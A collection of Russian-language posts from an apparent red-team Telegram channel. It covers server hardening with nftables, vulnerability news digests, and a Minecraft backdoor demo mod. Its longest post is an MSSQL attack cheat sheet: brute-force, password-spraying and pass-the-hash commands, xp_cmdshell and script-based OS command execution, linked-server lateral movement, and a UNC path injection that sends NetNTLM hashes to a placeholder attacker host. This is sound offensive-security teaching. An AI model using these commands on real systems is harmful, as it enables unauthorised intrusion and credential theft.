🎄 С наступающим 2025 годом от команды REDtalk! 🎉

Друзья, год подходит к концу, и мы хотим искренне поблагодарить каждого из вас за поддержку, активное участие и интерес к теме информационной безопасности! Вы вдохновляете нас делиться знаниями и вместе строить сообщество профессионалов, где каждый может узнать новое, обсудить идеи и обменяться опытом. 🥰

В 2025 году команда REDtalk готовит для вас ещё больше полезного контента. Давайте вместе продолжать расти, учиться и вдохновляться! 🚀

Желаем вам в новом году профессиональных побед, надёжной защиты, захватывающих проектов и, конечно, личного счастья, здоровья и новых ярких впечатлений! Пусть 2025 год станет временем новых возможностей и достижений! 🥂

Спасибо, что вы с нами. Оставайтесь на связи — впереди только лучшее!

С Новым годом! 🎆
Ваша команда REDtalk ❤️

#REDtalk

👨‍💻 Привет!

Всё в порядке, мы живы. Начинаем вкатываться в новый год.

Допустим у нас есть внешний сервер для проведения пентестов, редтимов и всего этого, и мы хотим его спрятать от посторонних глаз ботов и сок-аналитиков. Звучит просто, но что, если на сервере висит открытый порт? Как с ним быть?

1️⃣ Начну с пинга. По умолчанию популярные linux-дистрибутивы имеют службу, отвечающую за обработку ICMP-пакетов.
Убрать это просто. Достаточно добавить правило блокировки пакетов в межсетевой экран

nft add rule inet filter input icmp type echo-request drop  

2️⃣ Порты. Нужно постоянно держать в голове, что 24/7 по нашему серверу бегают боты и сканеры.

Для начала на всякий случай стоит добавить правила на дроп всех соединений. VPS-провайдеры любят вместе с дистрибутивом ставить какой-нибудь агент заббикса. В этом случае лучше написать правила на блокировку всего трафика и потом по мере необходимости добавлять белые списки:

# Очистка текущих правил 
sudo nft flush ruleset

# Создание таблицы и цепочек 
nft add table inet filter 
nft add chain inet filter input { type filter hook input priority 0; policy drop; } 
nft add chain inet filter output { type filter hook output priority 0; policy drop; } 
nft add chain inet filter forward { type filter hook forward priority 0; policy drop; }

# Исключение для lo  
nft add rule inet filter input iif lo accept 
nft add rule inet filter output oif lo accept

# Разрешение трафика для 22/tcp порта 
nft add rule inet filter input ct state established,related accept 
nft add rule inet filter output ct state established,related accept 
nft add rule inet filter input tcp dport 22 ct state new accept 
nft add rule inet filter output tcp sport 22 accept 
nft list ruleset > /etc/nftables.conf 
 

Для скрытия открытого порта достаточно переместить его на нестандартный (например, tcp/64022 вместо tcp/22). Это можно сделать, не изменяя конфигурацию сервиса, на котором открыт сокет:

nft add chain ip nat prerouting { type nat hook prerouting priority 0; } nft add chain ip nat postrouting { type nat hook postrouting priority 100; } 
nft add rule ip nat prerouting tcp dport 64022 dnat to :22

Или, если не хочется возится с правилами, можно использовать socat:

socat TCP-LISTEN:64022,fork TCP:localhost:22 

Но можно сделать еще лучше — фильтровать соединения от всех IP-адресов, которые не выполнили заданные условия. Я сделал для этого небольшой 🔗 PoC (гифка оттуда), использующий nftables для фильтрации и временной разблокировки конкретного адреса ко всем портам, если с него поступил HTTP-запрос. Есть также 🔗 похожее популярное решение . Таким образом боты и аналитики soc не смогут увидеть открытый порт, так как не придет TCP SYN+ACK пакет.

👍 Привет, коллеги!

Новая рабочая неделя только начинается, а мы предлагаем вам оглянуться назад, чтобы обсудить ключевые события из мира ИБ за прошедшую неделю.

📌 Утечка данных «Ростелекома»

21 января стало известно об утечке данных, связанной с крупнейшим российским оператором связи «Ростелеком». «Ростелеком» сообщил, что инцидент произошёл не в их собственной IT-инфраструктуре, а в системе подрядчика, который оказывает услуги компании, а также ранее уже подвергался кибератакам.
На данный момент известно, что утечка не затронула особо чувствительные данные, такие как финансовая информация клиентов или их пароли. Однако общий объём информации, попавшей в открытый доступ, всё же вызывает вопросы, особенно в контексте возможного использования этих данных в фишинговых атаках.
Утекли 154 тысячи электронных почт и более 100 тысяч телефонных номеров.

📌 PoC для уязвимости в Windows (CVE-2024-49138)

Опубликован PoC для уязвимости CVE-2024-49138. Напомним, что проблема была обнаружена в драйвере Windows Common Log File System (CLFS), который отвечает за работу системных журналов. Данная уязвимость позволяет получить привилегии system на хосте.
Патч естественно на месте.
А также ссылка на PoC.

📌 Критическая уязвимость в Windows OLE (CVE-2025-21298)

Обнаружена уязвимость в Windows OLE (Object Linking and Embedding), позволяющая выполнять произвольный код через специально созданные файлы. Вектором атаки могут быть phishing-рассылки. Открытие или предварительный просмотр письма в Microsoft Outlook может инициировать удалённое выполнение кода без какого-либо действия со стороны пользователя.
Патч от Microsoft уже доступен, и его установка — первый шаг.
Но помимо этого, рекомендуется отключить предварительный просмотр сообщений и настроить отображение писем в виде обычного текста для снижения риска эксплуатации, а также внедрить песочницы для проверки подозрительных вложений и уделить внимание обучению сотрудников основам иб.
Ссылка на POC

Что делать 😤 ?

Вывод очевиден: системы требуют обновлений, SOC – бдительности, а подрядчики – постоянной проверки. И да, помните: в ИБ расслабляться нельзя. 💪

🤩 Всем хорошей продуктивной недели! Подписывайтесь, чтобы не пропустить главное!

🙂 Как вам такой формат новостей, друзья?

#news

Привет, коллеги!

Выходные подходят к концу, а значит, самое время подвести итоги недели 🥺

🥺 Утечка данных DeepSeek

Исследователи Wiz Research обнаружили открытую базу данных ClickHouse китайской нейросети DeepSeek. Она была доступна без аутентификации и содержала:

🔹 Историю чатов пользователей,
🔹 API-ключи,
🔹 Внутренние конфигурационные файлы.

Серверы oauth2callback.deepseek.com:9000 и dev.deepseek.com:9000 позволяли свободно просматривать эти данные. После уведомления компания закрыла доступ.

🔗 Подробнее: Wiz Research


💀Критические уязвимости в ядре Linux

Опубликованы PoC для CVE-2024-56614 и CVE-2024-56615
Две критические уязвимости обнаружены в ядре Linux в механизме eBPF/XDP, который отвечает за высокопроизводительную обработку сетевых пакетов. Обе позволяют перезаписывать память ядра, что может привести к выполнению произвольного кода с правами root.

В чём проблема?
Ошибка связана с некорректным сравнением индексов элементов в массиве (signed int vs unsigned int) в функциях:

CVE-2024-56614 → xsk_map_delete_elem() (XSKMAP)
CVE-2024-56615 → dev_map_delete_elem() (DEVMAP)

В обоих случаях это приводит к выходу за границы памяти ядра (Out-of-Bounds Write) и возможности эскалации привилегий.

🔗 Ссылки на PoC:
🔹 CVE-2024-56614
🔹 CVE-2024-56615


💀Уязвимость в Apple CoreMedia (CVE-2025-24085)

Эта уязвимость типа "use-after-free" в компоненте CoreMedia, который отвечает за обработку медиа (видео и аудио ) на яблочных устройствах, позволяла вредоносным приложениям повышать привилегии.

Apple выпустила обновления для:

📱 iOS 18.3, iPadOS 18.3
💻 macOS Sequoia 15.3
⌚️ watchOS 11.3
📺 tvOS 18.3
🕶 visionOS 2.3

По словам представителей Apple, уязвимость могла активно эксплуатироваться против версий iOS до 17.2. Патч доступен с 27 января на всех яблочках.

Обновления также устраняют множество других уязвимостей, включая:
CVE-2025-24137: уязвимость типа "type confusion" в AirPlay, которая позволяла удаленному злоумышленнику вызвать неожиданное завершение приложения или выполнить произвольный код.

CVE-2025-24145: уязвимость, которая позволяла получить доступ к номеру телефона юзера через системные журналы.

CVE-2025-24107 и CVE-2025-24159: ошибки в ядре, которые позволяли вредоносному приложению получить root-привилегии.

CVE-2025-24128: уязвимость в Safari, которая связана с возможностью подмены адресной строки. При посещении специально созданного вредоносного сайта злоумышленник мог изменить отображаемый в адресной строке URL, вводя пользователя в заблуждение относительно подлинности сайта.

🔗 Подробнее: support.apple.com

Желаем вам хорошей и продуктивной предстоящей недели! Берегите данные и нервы 😡!

Добрый день, коллеги! ☕️

Новая неделя в самом разгаре. Предлагаем вам налить себе чашку кофе и вспомнить с нами события прошедшей недели!


💀Атаки на IIS с использованием публичных ASP. NET Machine Keys

🔍 Microsoft Threat Intelligence обнаружила более 3,000 утекших ASP. NET machine keys, которые злоумышленники используют для атак на IIS-серверы. Эти ключи, найденные в публичных репозиториях и документации, позволяют атакующим выполнять ViewState-инъекции и разворачивать Godzilla Malware.

Как работает атака?

1️⃣ViewState отвечает за сохранение состояния страниц в ASP. NET.
2️⃣ Для его защиты используются ValidationKey и DecryptionKey.
3️⃣Если эти ключи утекли, атакующие создают вредоносный ViewState и отправляют его на сервер.
4️⃣ IIS доверяет ViewState и выполняет код с привилегиями веб-приложения.

Рекомендации от Microsoft:

✅ Не используйте публичные machine keys — генерируйте уникальные ключи.
✅ Проверяйте свои ключи по базе хешей публичных ключей
✅ Ротируйте machine keys — регулярное обновление снижает риск компрометации.
✅ Обновите ASP. NET до 4.8 и включите Antimalware Scan Interface (AMSI).

Подробнее об уязвимости и защите — Microsoft Blog


⌨️Разбор LPE-уязвимости в AnyDesk

В сети опубликован анализ уязвимости в AnyDesk (CVE-2024-12754), позволяющей локальному злоумышленнику повысить привилегии до NT AUTHORITY\SYSTEM.

Как это работает?

Когда пользователь инициирует новую сессию, сервис AnyDesk копирует фоновое изображение рабочего стола в C:\Windows\Temp\, сохраняя оригинальное имя файла. Но поскольку низкопривилегированные пользователи могут создавать файлы в этой директории, атакующий может заранее создать файл с тем же именем. В результате служба AnyDesk перезаписывает этот файл с системными привилегиями, передавая злоумышленнику полный контроль.

💻Для любителей покопаться в деталях, ребята из @RedTeambro подготовили Proof-of-Concept, который можно найти здесь: POC

📖 Подробный разбор уязвимости можно найти здесь: LPE AnyDesk research


🛡Обновление безопасности Android

Google выпустила обновление безопасности для Android, устраняющее 47 уязвимостей, многие из которых являются критическими.

Наиболее критичные уязвимости:

CVE-2024-53104: Уязвимость высокой степени опасности в драйвере USB Video Class (UVC) ядра Linux. Проблема связана с некорректной обработкой видеокадров, что приводит к записи данных за пределами допустимых границ в функции uvc_parse_format(). Это позволяет злоумышленникам повышать привилегии, выполняя произвольный код или вызывая сбои устройства.

CVE-2024-45569: Критическая уязвимость в компонентах WLAN от Qualcomm с оценкой CVSS 9.8. Она связана с повреждением памяти из-за неправильной проверки индексов массива при обработке сетевых управляющих кадров, что может привести к удаленному выполнению кода.

Обновление доступно для устройств Google Pixel и будет постепенно распространяться на устройства других вендоров.

Подробнее ознакомиться с обновлением можно здесь


Всем продуктивной и насыщенной недели! Оставайтесь с нами. В ближайшее время добавим для вас больше разнообразного контента!

#news

😎 Привет!
Сначала я хотел оформить этот материал в виде статьи, но думаю, поста будет достаточно.

Я тут недавно заинтересовался темой доставки малварей через игры, в частности, через Minecraft, и прифигел от их количества. Думаю, не для кого не новость, что тем или иным образом возможно вставить вредоносный код внутрь исходного кода, например, невнимательным апрувом пул-реквеста, и он сохранится в последующих версиях, до момента обнаружения. Но в нашем случае всё гораздо легче.

Вернемся к майнкрафту. Так уж получилось, что на самую продаваемую игру в мире сделано самое большое количество модов. А мы знаем, что чем популярнее платформа, тем больше внимания на нее обращают хацкеры. В интернете полно историй про взлом клиентов и серверов через Minecraft, я даже как-то делал пост на эту тему.

Так вот, я решил создать 🔗 мод, который покажет неосведомленным пользователем, почему нехорошо качать модпаки со случайных источников. Сейчас в моде присутствует безобидный бекдур с реверс шеллом на 127.0.0.1 31337/tcp, а также чат-команда /reverseshell для создания шелла на заданный адрес. В будущем предполагается добавить побольше интересных нагрузок и красивый интерфейс внутри игры, но без импакта пользователю (если, конечно, он сам этого не захочетXD)

🙂Привет, друзья!

На собеседованиях я часто спрашиваю про абьюз Microsoft SQL Server, и, к моему удивлению, многие знают о нём поверхностно. А ведь MSSQL широко используется в корпоративных сетях и при неправильной настройке может стать удобной точкой входа для атакующего.

В этом посте я постарался собрать основные техники абьюза MSSQL, которые помогут лучше понять возможные векторы атак, подготовиться к собеседованию и собрать ваши знания воедино.

📖 Немного теории

Microsoft SQL Server (MSSQL) — это реляционная СУБД от Microsoft, активно используемая в корпоративных сетях для хранения и обработки данных.

Основные компоненты:
🔹 Database Engine — отвечает за хранение, обработку и управление данными.
🔹 SQL Server Agent — автоматизация задач (например, резервное копирование).
🔹 SQL Server Browser — помогает клиентам находить MSSQL-инстансы.
🔹 SSIS (SQL Server Integration Services) — инструмент для интеграции данных.
🔹 SSRS (SQL Server Reporting Services) — генерация отчетов.
🔹 SSAS (SQL Server Analysis Services) — аналитика и обработка данных.

Основные роли в MSSQL:
🔹 sysadmin — полные привилегии на сервере.
🔹 db_owner — полные права в конкретной базе данных.
🔹 db_datareader — доступ только на чтение данных.
🔹 db_datawriter — возможность изменять данные.
🔹 public — назначается всем пользователям по умолчанию и может давать больше доступа, чем кажется.

Способы аутентификации:
🔹Windows Authentication — через доменную аутентификацию (NTLM/Kerberos).
🔹 SQL Authentication — локальные учетные записи MSSQL (sa, пользовательские логины).


Обнаружение MSSQL в сети

Прежде чем “что-то” ломать, нам это “что-то” надо найти.

#PowerUpSQL
Get-SQLInstanceDomain

#nmap
nmap -p 1433 --script ms-sql-info <IP>

#Metasploit
auxiliary/scanner/mssql/mssql_ping

#go-windapsearch
go-windapsearch -d domain.local -u Administrator -p 'password1111' -m custom --filter="(&(objectClass=computer)(servicePrincipalName=*MSSQLSvc/*))" --attrs cn,servicePrincipalName
​

🥰 Доступ к MSSQL

#brute force
hydra -L users.txt -P pass.txt <IP> mssql
netexec mssql <target-ip> -u username -p passwords.txt

#password spraying
netexec mssql example.com -u usernames.txt -p 'password' --no-bruteforce --continue-on-success

#Pass-the-Hash
netexec mssql example.com -u usernames.txt -H <NTLM_HASH> --continue-on-success

impacket-mssqlclient DOMAIN/user@IP -hashes <YourHash>  
​

🤪 Повышение привилегий: от локального админа до sysadmin

Основной процесс SQL Server — это sqlservr.exe. Даже если у учетной записи SQL Server в Windows нет высоких привилегий, в самом SQL Server она по умолчанию получает роль sysadmin.

Компрометация службы SQL Server может привести к компрометации всего домена!

Шаг 1: Найдём локальный SQL Server.

# PowerUpSQL
Get-SQLInstanceLocal

Шаг 2: Получаем учетную запись SQL Server

#PowerUpSQL
Invoke-SQLImpersonateService -Verbose -Instance your_instance_name

​
🤗 Выполнение команд в OS через MSSQL

Злоумышленник, имея доступ к MSSQL, может выполнить команды Windows на сервере. Может он это сделать следующими способами:

🔹CLR (Common Language Runtime) Assembly — это механизм в Microsoft SQL Server, который позволяет выполнять .NET-код (C#, VB.NET, etc.) внутри базы данных.

#PowerUpSQL
Invoke-SQLOSCLR -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"

​
🔹OLE Automation Procedures — это механизм в Microsoft SQL Server, который позволяет запускать объекты COM (Component Object Model) напрямую из T-SQL.

#PowerUpSQL
Invoke-SQLOSOle -Username sa -Password Pass123 -ServerInstance <IP> -Command "whoami"

​
🔹xp_cmdshell - встроенная хранимая процедура в Microsoft SQL Server, которая позволяет выполнять команды Windows напрямую из T-SQL

#SQL Server CLI
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';

#PowerUpSQL
Invoke-SQLOSCmd -Username sa -Password sa -Instance your_instance_name -Command "whoami"

<продолжение>


🔹External Scripts (Python/R) - механизм в Microsoft SQL Server, который позволяет выполнять Python и R-код

#SQL Server CLI
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))

EXEC sp_execute_external_script
@language=N'R',
@script=N'OutputDataSet <- data.frame(system("cmd.exe /c whoami",intern=T))'
WITH RESULT SETS (([cmd_out] text));
GO

#PowerUpSQL
#REMOTE
Invoke-SQLOSCmdPython -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"

Invoke-SQLOSCmdR -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"

#LOCAL Instance
Get-SQLInstanceLocal | Invoke-SQLOSCmdPyrhon -Verbose -Command "whoami"

Get-SQLInstanceLocal | Invoke-SQLOSCmdR -Verbose -Command "whoami"

​
👅 UNC Path Injection

Позволяет утянуть NetNTLM-хеш через SMB

#SQL Server CLI
EXEC xp_cmdshell 'net use Z:\\YOUR_IP\share';

#PowerUpSQL
Invoke-SQLUncPathInjection -Verbose -CaptureIp YourResponderHost

​
🤪 Lateral Movement через Linked Servers

Linked Servers — это механизм в Microsoft SQL Server, который позволяет подключаться к другим SQL Server'ам или внешним базам данных (MySQL, Oracle, PostgreSQL, файловым источникам и т. д.)

#Просмотр связанных серверов
EXEC sp_linkedservers;

#Выполнение команды на удалённом сервере
EXEC ('whoami') AT [LINKED_SERVER];

#PowerUpSQL
#поиск связанных серверов
Get-SQLServerLink -Instance YourInstance -Verbose

#проверка прав на удаленном сервере
Get-SQLServerLinkCrawl -Instance YourInstance -Verbose

#включаем xp_cmdshell на linked сервере
Get-SQLServerLinkCrawl -Instance YourInstance -Query "EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT YOUR_LINKED_SERVER"​

На этом всё, друзья! 🎯
Всем удачного хакинга и до новых встреч!

#redteam

👨‍💻 Привет!

У нас у всех сейчас плотный график работы (ну вы знаете, эти пентесты), поэтому стараемся выкладывать посты, как можем.

Сегодня я хочу показать, почему плохо использовать Notepad++ для создания временных пометок. Под капотом он раскидывает информацию из несохраненных вкладок по файлам в %appdata%\notepad++\backup\, а на практике многие забывают удалять конфиденциальную информацию, так и оставив её висеть в файле. На гифке 🔗 PoC (куда же без него?) - стиллер этих файлов

Давайте все будем секурными и почистим папку backup 😼

P. S. Я сейчас работаю над одной мега-штукой для канала. Должно получится круто, ждите новостей :)

Друзья, всем привет!!!🤗

Наши друзья с канала «СБПроБизнес» отмечают свой день рождения и приглашают всех на большой праздничный стрим! 👍

📅 Сегодня, 13 марта
⏰ Старт в 12:00 МСК
📍 Канал «СБПроБизнес»
🔗 Ссылка на стрим: https://t.me/sbprobiz/1693

Что вас ждет

🔹 12:00–13:00 — Алексей Швецкий
Тема: «Зачем бизнесу безопасник? Как понять, что мы молодцы?»

🔹 13:00–14:00 — Игорь Бедеров
Тема: «Стань ближе к информационной безопасности!»

🔹 14:00–15:00 — Александр Негода
Тема: «От мифов к реальной защите: роль пентеста в безопасности бизнеса»

😑 А вот тут говорят будет особенно интересно! Наш автор расскажет, зачем бизнесу на самом деле нужен пентест и почему он так важен🙂

🔹 15:00–16:00 — Сергей Суйков
Тема: «Кодекс этики: клятва пионера или свод обычаев?»

🔹 16:00–17:00 — Александр Елин
Тема: «Управление на основе данных. Мобильный цифровой ситуационный центр: примеры из жизни»

🔹 17:00–18:00 — Алексей Меркулов
Тема: «Защита от социальных инженеров»

❕Важно, этот эфир будет не о технических нюансах, а о том, как безопасность помогает бизнесу развиваться, зарабатывать и защищаться от рисков.

Если интересна эта тема и вы хотите больше в ней разобраться, — этот стрим для вас!🐾

💥 Привет!

А тем временем нас набралось уже 800 кулхацкеров 🤯 (УК РФ Статья 272.1: "не блечить"). Спасибо, что вы с нами.

P. S. Думаю, на 1к пора будет создать холиварный чат канала

Всем привет, друзья🐾

Делимся с вами записью эфира в честь дня рождения телеграмм канала СБПроБизнес.

Спикер - Александр Негода (@closed_character).

Тема выступления:

От мифов к реальной защите бизнеса: какую роль играет пентест в безопасности бизнеса?

Посмотреть видео можете по ссылкам:

📺Rutube

📝Дзен

📺ВК

📺YouTube

🤯 Привет!

Все мы хоть раз в той или иной степени прикасались к прекрасному к ЦТФам. Лично я, может и не очень часто, но регулярно стараюсь принимать активность в различных ИБ-соревах. Так вот, недавно прошел Cyber Apocalypse CTF 2025 от HTB, и после него у меня в некотором смысле накипело, хочется высказать свое объективно-субъективное мнение по ошибкам в организации CTF-соревнований, попунктно:

1️⃣ Первая проблема, с которой начинает подгорать уже с первых минут игры - это падение доски сразу после начала. Таски недоступны, личка админов и канала засраны, в общем ничего удивительного. Происходит это потому, что после старта все игроки одновременно жмав кнопку обновления страницы с доской, а поняв, что она перестала работать, начинают обновлять в 5 раз чаще, из-за чего производят распределенную DOS-атаку ⌨️ и ложат сервера. Лечится это вроде просто - временно добавить на первые часы игры больше ресурсов, но на практике такого не происходит;

2️⃣ Система оценивания тасков. Тут уже поинтереснее — Идут постоянные споры на счет оценки. Лично я топлю за динамическое распределение очков, в зависимости от количества решений. Однако, если неправильно настроить отношение решений к общему количеству команд, то произойдет следующее — На прошедшей сореве был таск с 30 решениями и таск с 3000 решениями. За первый дали 950 баллов (из 1000), а за второй, внимание, 800 (из 1000). Хочется плакать, но я не буду;

3️⃣ Еще одна проблема, особенно в глобальных соревах, это флаг-шеринг. Откуда только не просят дать подсказку, начиная с реддита и заканчиваю breach forums. Кто-то даже продает решение таска за 💲валюту💲. Да, есть система проверки, которая добавляет в конец влага id, привязанный к конкретной команде, но это сложно в реализации и не ко всем таскам применимо. Да и эффективность своеобразная;

4️⃣ Собственно, сами таски. Когда в сореве (не от HTB, там всё по заданиям нормально), позиционирующей себя, как не для начинающих, ты видишь категории “stega, crypto, web, osint” (Да простят меня осинтеры), при том, что в крипте лежат 2 таска на шифр Цезаря и статистический анализ, плакать хочется еще больше. Лечится это тоже просто — Обходить стороной такие соревы (без негатива), и держаться крутых, у которых таски приближены к реальности.

Ну вроде всё. Всем желаю находить время на CTF, играть в кайф в команде или в соло, и побежать (опционально)🤩